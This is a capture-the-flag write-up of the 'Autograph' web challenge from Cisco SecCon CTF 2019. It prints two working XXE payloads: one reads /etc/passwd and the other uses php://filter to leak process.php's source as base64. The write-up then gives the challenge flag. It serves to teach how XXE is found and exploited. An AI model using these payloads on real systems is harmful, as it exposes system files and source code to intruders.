XXE Injection - Cisco SecCon CTF

September 30, 2019

I scored a total of 3000 points out of 4100 in the Cisco SecCon CTF 2019. There were a lot of interesting problems. Here, I am going to write about a web challenge called Autograph.

The first thing I saw on the website was a registration form. There was a script in the source code to package all the information and send it as XML. There was also a comment <!-- EVERYONE EXCEPT "ADMIN" CAN REGISTER FOR THE EVENT !-->.

After reading the comment, I tried putting in the name field's value as admin and realized that in order to get back the email's value reflected to the webpage, the name field had to have the value "admin".

For ANY value of email, it reflected back the email (saying that it already exists). I tried entering the form on the webpage with some random values and intercepted the request through Burp. After seeing the XML in the request body, I thought of trying out an XXE payload. 


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM "file:///etc/passwd">
]>
<root>
	<name>admin</name>
	<email>&bar;</email>
</root>

The payload worked, as the /etc/passwd contents were returned. Now I could browse around the server. After scratching my head for a while, I remembered that the XML data is being submitted to process.php (the same file the XML data is posted to).

I thought of viewing this file on the server but when I tried to view it, I got the result of the php file executing and not the actual source code. In order to see the source code of the file, I used php://filter to convert it into base64 and then got the contents reflected into the response. 


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM "php://filter/convert.base64-encode/resource=process.php">
]>
<root>
	<name>admin</name>
	<email>&bar;</email>
</root>

After getting the base64 encoded string, I decoded it and saw the contents of the process.php file. The first line contained an include to another file.

Using the same technique as before, I got the source of the newly found file which had the flag.

Flag: SecConCTF{HEY_I_THOUGHT_XML_WAS_SAFE:(}